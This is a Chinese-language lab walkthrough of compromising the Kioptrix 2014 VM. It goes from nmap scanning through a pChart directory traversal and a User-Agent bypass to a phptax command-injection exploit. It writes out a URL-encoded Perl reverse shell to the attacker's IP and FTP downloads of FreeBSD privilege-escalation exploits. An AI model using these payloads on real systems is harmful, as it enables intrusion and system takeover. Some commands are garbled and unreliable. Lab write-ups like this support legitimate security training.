005靶场-Kioptrix2014-level5(*)
靶场文件下载到自己的VMware虚拟机进行实验信息收集主机探测nmap -sP 192.168.115.0/24 --min-rate1000 直接进行主机探测 nmap -p- 192.168.115.0/24 -- 主机及端口号信息都探测出来探测端口服务版本信息nmap 192.168.115.143 -T4 -A -O --min-rate1000PORT STATE SERVICE VERSION22/tcp closed ssh80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)|_http-title: 403 ForbiddenMAC Address: 00:0C:29:30:18:76 (VMware)Device type: general purposeRunning (JUST GUESSING): FreeBSD 9.X|10.X (87%)OS CPE: cpe:/o:freebsd:freebsd:9.3 cpe:/o:freebsd:freebsd:10Aggressive OS guesses: FreeBSD 9.3-RELEASE (87%), FreeBSD 9.0-RELEASE - 10.3-RELEASE (86%)No exact OS matches for host (test conditions non-ideal).Network Distance: 1 hopkali探测是否存在历史漏洞nmap 192.168.115.144 -p 22,80,8080 --scriptvuln别忘了使用 wappalyzer 查看一下相关信息漏洞突破对收集到的信息进行汇总有80端口就打开查看页面查看一下发现没什么线索然后想到查看网页源码试试发现了80端口的URLpChart2.1.3/index.php:kali看一下是否有相关poc说明可以利用试试下载下来看看说的什么目录穿越和xss漏洞http://192.168.115.144/pChart2.1.3/examples/index.php?ActionViewScript/../../etc/passwd但是没有更多提示了我们要拿shell在百度或是github获得更多利用信息。到这里已经陷入僵局了还得返回来看收集到的信息Apache 2.2.21操作系统是FreeBSD然后通过FreeBSD官方文档: https://docs.freebsd.org/en/books/handbook/network-servers/#network-apache得知apache配置文件地址/usr/local/etc/apache2x/httpd.conf这种目录遍历漏洞一般就是利用他找一些相关配置文件找到访问8080端口的秘诀只允许Mozilla4的头访问Mozilla/4.0Mozilla/4.0然后点击看到了如下搜索漏洞信息:searchsploit phptaxsearchsploit -m php/webapps/25849.txt cat 25849.txt,发现关键代码于是说明有命令执行漏洞所以进行反弹shell测试反弹shell需要一个又一个的去试最后这个反弹成功perl%20-MIO%20-e%20%27$pfork;exit,if($p);$cnew%20IO::Socket::INET(PeerAddr,192.168.115.130:666);STDIN-fdopen($c,r);$~-fdopen($c,w);system$_%20while;%27靶机没有python所以做不了交互式shell系统提权查系统相关信息发现 lsb_release -a 也用不了只可以使用uanme -akali搜索一下FreeBSD 9.0 的漏洞信息searchsploit FreeBSD 9.0说明有两个提权的文件接下来需要把这两个文件下载到目标机器查看目标机器有的下载文件的命令使用which 查看当前环境变量可以执行的下载命令发现只有ftp和ncftp就是传文件协议kali机python -m pyftpdlib目标机ftp ftp://192.168.115.130:2121/28718.cftp ftp://192.168.115.130:2121/26368.c由于没有交换式终端等一会再看然后使用gcc命令编译然后执行提权成功思路梳理扫到22、80、8080、端口但是页面只有It works!没有任何提示。查看网页源代码找到一个pchat路径可以访问。进行信息收集发现有漏洞但是可利用的只有目录遍历漏洞。继续进行信息收集打开8080端口发现权限不允许访问。继续收集信息找到Apache 2.2.21操作系统是FreeBSD找到官方文档发现配置Apache配置文件利用上面的目录遍历漏洞找到配置文件相关信息发现8080只允许Mozilla4浏览器访问于是修改ua头。最后发现8080下面是phptaxkali下搜索漏洞发现命令执行漏洞。利用命令执行进行反弹shell--需要大量尝试成功。提权的时候的发现目标机器没有python不能交互式shell没有wget没有curl最后使用ftp下载目标exp提权成功。